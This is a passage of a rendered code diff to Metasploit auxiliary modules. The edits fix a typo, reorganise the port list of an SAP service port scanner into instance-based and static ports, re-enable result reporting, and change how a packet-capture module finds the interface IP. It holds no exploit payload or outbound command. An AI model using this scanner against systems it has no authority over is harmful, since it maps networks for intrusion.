||||||
|
# when trying to report a service on 127.0.0.1
|
||||||
|
print_warning("Can't report #{res[0]} as host to the database")
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
print_warning("Warning: Service info could be innacurated")
|
print_warning("Warning: Service info could be inaccurate")
|
||||||
print(tbl.to_s)
|
print(tbl.to_s)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
def_ports = [
|
def_ports = [
|
||||||
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
|
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
|
||||||
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
|
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
|
||||||
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
|
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00',
|
||||||
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
|
'3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08',
|
||||||
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
|
'3NN11', '3NN17'
|
||||||
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
|
|
||||||
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
|
|
||||||
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
|
|
||||||
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
|
|
||||||
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
|
|
||||||
]
|
]
|
||||||
|
|
||||||
|
static_ports = [
|
||||||
|
'21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299',
|
||||||
|
'3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200',
|
||||||
|
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004',
|
||||||
|
'20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604',
|
||||||
|
'2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366',
|
||||||
|
'1090', '1095', '20201', '1099', '1089'
|
||||||
|
]
|
||||||
|
|
||||||
ports = []
|
ports = []
|
||||||
|
|
||||||
# Build ports array from valid instance numbers
|
# Build ports array from valid instance numbers
|
||||||
|
@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
final_ports << dport.gsub("NN", inst)
|
final_ports << dport.gsub("NN", inst)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
final_ports.push(*static_ports)
|
||||||
ports = final_ports
|
ports = final_ports
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
|
@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
print_good("#{ip}:#{port}\t - #{service} OPEN")
|
print_good("#{ip}:#{port}\t - #{service} OPEN")
|
||||||
|
|
||||||
=begin
|
begin
|
||||||
report_note(:host => "#{ip}",
|
report_note(
|
||||||
|
:host => "#{ip}",
|
||||||
:proto => 'TCP',
|
:proto => 'TCP',
|
||||||
:port => "#{port}",
|
:port => "#{port}",
|
||||||
:type => 'SAP',
|
:type => 'SAP',
|
||||||
:data => "#{service}")
|
:data => "#{service}"
|
||||||
=end
|
)
|
||||||
|
end
|
||||||
r << [ip,port,"open", service]
|
r << [ip,port,"open", service]
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
vprint_status("#{ip}:#{port}\t - TCP closed")
|
vprint_status("#{ip}:#{port}\t - TCP closed")
|
||||||
|
|
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# this is needed on windows cause we send interface directly to Pcap functions
|
# this is needed on windows cause we send interface directly to Pcap functions
|
||||||
@interface = get_interface_guid(@interface)
|
@interface = get_interface_guid(@interface)
|
||||||
@iface_ip = datastore['LOCALIP']
|
@iface_ip = datastore['LOCALIP']
|
||||||
@iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces
|
@iface_ip ||= get_ipv4_addr(@interface) if netifaces
|
||||||
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
|
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
|
||||||
|
|
||||||
# start with blank slate
|
# start with blank slate
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue